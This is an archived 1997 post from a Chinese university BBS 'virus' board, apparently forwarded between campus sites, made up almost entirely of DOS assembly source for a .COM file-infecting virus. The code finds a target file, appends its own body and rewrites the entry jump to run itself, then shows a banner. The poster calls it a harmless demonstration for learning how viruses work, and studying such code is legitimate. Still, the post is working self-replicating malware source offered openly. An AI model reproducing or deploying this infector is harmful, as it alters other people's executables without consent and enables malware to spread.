紫丁香社区计算机病毒 → 精华区文章阅读

Virus 版 (精华区)

作  家: yanyan (岩岩) on board 'virus'
题  目: 病毒演示
来  源: 哈尔滨紫丁香站
日  期: Fri Aug  8 10:35:43 1997
出  处: bbs@bbs.orange.sjtu.edu.cn

发信人: Stephan.bbs@bbs.swjtu.edu.cn (忘了吧), 信区: virus
标  题: 病毒演示
发信站: 锦城驿站 (Fri Jul 25 19:57:15 1997)
转信站: sjtubbs!sjtunews!swjtunews!swjtubbs
Origin: xnjd21.swjtu.edu.cn

;本病毒并无实质的破坏作用,仅供
;同仁理解Virus原理

;病毒源程序
   code segment
   ASSUME CS:CODE ,DS:CODE
  VIRUS:MOV AX,CS
        MOV DS,AX
        MOV ES,AX
        DB  0BBH
  GROW  DW  0H
        LEA SI,BUFFER0[BX]
        MOV DI,100H
        MOV CX,3
        REP MOVSB
        MOV AH,1AH
        LEA DX,DIR_BUFF[BX]
        INT 21H
        MOV AH,4EH
        MOV CX,20H
        LEA DX,SCH_STR[BX]
        INT 21H
        JC  FAIL0
        LEA DI,DIR_BUFF[BX]
        MOV CX,8
        INC DI
        MOV AL,3FH
        REP STOSB
        MOV AH,4FH
        INT 21H
  FAIL0:JC  FAIL1
        LEA DI,SCH_STR[BX]
        LEA SI,FILE_NAME[BX]
        CLD
        MOV CX,13
        REP MOVSB
        MOV AH,3DH
        MOV AL,2
        LEA DX,FILE_NAME[BX]
        INT 21H
  FAIL1:JNC FAIL3
        JMP FAIL2
  FAIL3:MOV FHANDLE[BX],AX
        MOV AH,42H
        MOV AL,0
        PUSH BX
        MOV BX,FHANDLE[BX]
        MOV CX,0
        MOV DX,0
        INT 21H
        POP BX
        MOV AH,3FH
        PUSH BX
        LEA DX,BUFFER0[BX]
        MOV BX,FHANDLE[BX]
        MOV CX,3
        INT 21H
        POP BX
        MOV AH,42H
        MOV AL,2
        PUSH BX
        MOV BX,FHANDLE[BX]
        MOV CX,0
        MOV DX,0
        INT 21H
        POP BX
        SUB AX,3
        MOV BUFFER2[BX],AX
        ADD AX,103H
        MOV GROW[BX],AX
        MOV DX,FILE_LENGTH[BX]
        ADD AX,DX
        JC FAIL2
        MOV AH,BUFFER0[BX]
        CMP AH,0E9H
        JNZ WRITE
        MOV AX,BUFFER2[BX]
        SUB AX,BUFFER3[BX]
        CMP AX,FILE_LENGTH[BX]
        JZ CLOSE
  WRITE:MOV AH,40H
        MOV DX,BX
        PUSH BX
        MOV DX,BX
        MOV CX,FILE_LENGTH[BX]
        MOV BX,FHANDLE[BX]
        INT 21H
        POP BX
        MOV AH,42H
        MOV AL,0
        PUSH BX
        MOV BX,FHANDLE[BX]
        MOV CX,0
        MOV DX,0
        INT 21H
        POP BX
        MOV AH,40H
        LEA DX,BUFFER1[BX]
        PUSH BX
        MOV BX,FHANDLE[BX]
        MOV CX,3
        INT 21H
        POP BX
 CLOSE: MOV AH,3EH
        PUSH BX
        MOV BX,FHANDLE[BX]
        INT 21H
        POP BX
        MOV AH,2CH
        INT 21H
        AND AH,02H
        ;JZ FAIL2
        CALL SHOW
        PUSH CS
        MOV AX,100H
        PUSH AX
        XOR AX,AX
        RETF
        ;JMP SHORT 100
 FAIL2: LEA AX,BACK[BX]
        SUB AX,0FEH
        NOT AX
        INC AX
        MOV BACK[BX],AX
        MOV AH,4CH
        INT 21H
        DB  0E9H
   BACK DW 0FFEBH
   SHOW:MOV AX,2
        INT 10H
        MOV AH,9
        LEA DX,STRING[BX]
        INT 21H
        RET
 STRING DB 0AH,0AH,0AH,0DH
        DB 'SWTJU VIRUS v0.01 '
        DB '(c)CopyRight 97.7 By Computer Application 94'
        DB 0ah,0dh
        DB ':)I will not damage your program!:)$'
 SCH_STR        DB 'VIRUS100.COM',0
 DIR_BUFF       DB 30 DUP(?)
 FILE_NAME      DB 13 DUP(?)
 BUFFER0        DB 0CDH
 BUFFER3        DW 0020H
 BUFFER1        DB 0E9H
 BUFFER2        DW 0
 FILENAME       DB 13 DUP(?)
 FHANDLE        DW 0
 FILE_LENGTH    DW $+2


     CODE ENDS
     END VIRUS



--
※ 来源:.锦城驿站 bbs.swjtu.edu.cn.[FROM: 202.115.66.23]

--
※ 来源:·哈尔滨紫丁香站 bbs1.hit.edu.cn·[FROM: bbs@bbs.orange.sjtu.] 
[百宝箱] [返回首页] [上级目录] [根目录] [返回顶部] [刷新] [返回]
Powered by KBS BBS 2.0 (http://dev.kcn.cn)
页面执行时间:3.057毫秒